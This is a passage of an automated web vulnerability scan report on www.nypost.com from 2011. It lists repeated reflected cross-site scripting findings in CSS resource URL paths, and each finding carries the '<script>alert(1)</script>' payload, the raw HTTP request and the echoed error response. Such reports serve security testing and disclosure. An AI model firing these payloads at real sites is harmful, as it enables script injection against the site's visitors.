Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig5272f<script>alert(1)</script>54eedcc8a59/WebPortal/nypost/blocks/popup/popup.css</p>
...[SNIP]...

1.258. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c7972<script>alert(1)</script>91bef6fcb8b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortalc7972<script>alert(1)</script>91bef6fcb8b/nypost/blocks/popup/popup.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 715
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:08 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortalc7972<script>alert(1)</script>91bef6fcb8b/nypost/blocks/popup/popup.css</p>
...[SNIP]...

1.259. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 33129<script>alert(1)</script>83e3088b009 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost33129<script>alert(1)</script>83e3088b009/blocks/popup/popup.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 715
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost33129<script>alert(1)</script>83e3088b009/blocks/popup/popup.css</p>
...[SNIP]...

1.260. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7fc95<script>alert(1)</script>95654b959da was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks7fc95<script>alert(1)</script>95654b959da/popup/popup.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 715
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks7fc95<script>alert(1)</script>95654b959da/popup/popup.css</p>
...[SNIP]...

1.261. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload aeee3<script>alert(1)</script>6ad20dfcf88 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/popupaeee3<script>alert(1)</script>6ad20dfcf88/popup.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 715
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:16 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/popupaeee3<script>alert(1)</script>6ad20dfcf88/popup.css</p>
...[SNIP]...

1.262. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 2c690<script>alert(1)</script>428078804af was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css2c690<script>alert(1)</script>428078804af HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 715
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:19 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/popup/popup.css2c690<script>alert(1)</script>428078804af</p>
...[SNIP]...

1.263. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3a2ce<script>alert(1)</script>2ed6153ec96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig3a2ce<script>alert(1)</script>2ed6153ec96/WebPortal/nypost/blocks/post_pics/post_pics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig3a2ce<script>alert(1)</script>2ed6153ec96/WebPortal/nypost/blocks/post_pics/post_pics.css</p>
...[SNIP]...

1.264. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a599<script>alert(1)</script>47bd1fdd84d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal1a599<script>alert(1)</script>47bd1fdd84d/nypost/blocks/post_pics/post_pics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal1a599<script>alert(1)</script>47bd1fdd84d/nypost/blocks/post_pics/post_pics.css</p>
...[SNIP]...

1.265. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d4e27<script>alert(1)</script>057ad3e4165 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostd4e27<script>alert(1)</script>057ad3e4165/blocks/post_pics/post_pics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:19 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostd4e27<script>alert(1)</script>057ad3e4165/blocks/post_pics/post_pics.css</p>
...[SNIP]...

1.266. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d9235<script>alert(1)</script>99ea843288a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksd9235<script>alert(1)</script>99ea843288a/post_pics/post_pics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:21 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksd9235<script>alert(1)</script>99ea843288a/post_pics/post_pics.css</p>
...[SNIP]...

1.267. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 93e2e<script>alert(1)</script>5a94076ff26 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/post_pics93e2e<script>alert(1)</script>5a94076ff26/post_pics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:23 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/post_pics93e2e<script>alert(1)</script>5a94076ff26/post_pics.css</p>
...[SNIP]...

1.268. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c7ad7<script>alert(1)</script>c89da63014 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.cssc7ad7<script>alert(1)</script>c89da63014 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.cssc7ad7<script>alert(1)</script>c89da63014</p>
...[SNIP]...

1.269. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ac4e7<script>alert(1)</script>620b5623769 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigac4e7<script>alert(1)</script>620b5623769/WebPortal/nypost/blocks/post_video/post_video.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:21 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigac4e7<script>alert(1)</script>620b5623769/WebPortal/nypost/blocks/post_video/post_video.css</p>
...[SNIP]...

1.270. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8c024<script>alert(1)</script>7c29b147721 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal8c024<script>alert(1)</script>7c29b147721/nypost/blocks/post_video/post_video.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:23 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal8c024<script>alert(1)</script>7c29b147721/nypost/blocks/post_video/post_video.css</p>
...[SNIP]...

1.271. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d427<script>alert(1)</script>673f54c1be1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost4d427<script>alert(1)</script>673f54c1be1/blocks/post_video/post_video.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:25 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost4d427<script>alert(1)</script>673f54c1be1/blocks/post_video/post_video.css</p>
...[SNIP]...

1.272. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload dd05b<script>alert(1)</script>6ef30eeb179 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksdd05b<script>alert(1)</script>6ef30eeb179/post_video/post_video.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:26 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksdd05b<script>alert(1)</script>6ef30eeb179/post_video/post_video.css</p>
...[SNIP]...

1.273. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 997c8<script>alert(1)</script>1fab4d8a2fc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/post_video997c8<script>alert(1)</script>1fab4d8a2fc/post_video.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:29 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/post_video997c8<script>alert(1)</script>1fab4d8a2fc/post_video.css</p>
...[SNIP]...

1.274. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 64d0f<script>alert(1)</script>659f5696f28 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css64d0f<script>alert(1)</script>659f5696f28 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:30 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css64d0f<script>alert(1)</script>659f5696f28</p>
...[SNIP]...

1.275. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/search/search.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cf1df<script>alert(1)</script>5acd17d40a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigcf1df<script>alert(1)</script>5acd17d40a9/WebPortal/nypost/blocks/search/search.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:08 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigcf1df<script>alert(1)</script>5acd17d40a9/WebPortal/nypost/blocks/search/search.css</p>
...[SNIP]...

